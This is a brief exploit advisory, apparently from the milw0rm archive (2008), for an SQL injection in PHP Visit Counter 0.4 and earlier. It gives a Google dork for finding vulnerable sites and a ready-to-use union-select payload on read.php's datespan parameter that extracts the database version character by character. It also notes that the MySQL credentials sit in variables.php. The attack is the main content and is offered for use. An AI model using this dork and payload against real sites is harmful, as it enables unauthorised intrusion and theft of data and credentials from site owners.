############################################################### # # PHP Visit Counter <= 0.4 - SQL Injection Vulnerability # # Vulnerability discovered by: Lidloses_Auge # Greetz to: -=Player=- , Suicide, g4ms3, enco, # GPM, Free-Hack, Ciphercrew, h4ck-y0u # Date: 30.05.2008 # ############################################################### # # Dork: inurl:"read.php?datespan=" # # Vulnerability: # # 1.) SQL Injection # # 1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/* # # Notes: # # Output is displayed as INT, so you've to convert it into ascii and # scan every single letter to get the whole name. # MySQL Data is stored in [Counterpath]/variables.php # ############################################################### # milw0rm.com [2008-05-31]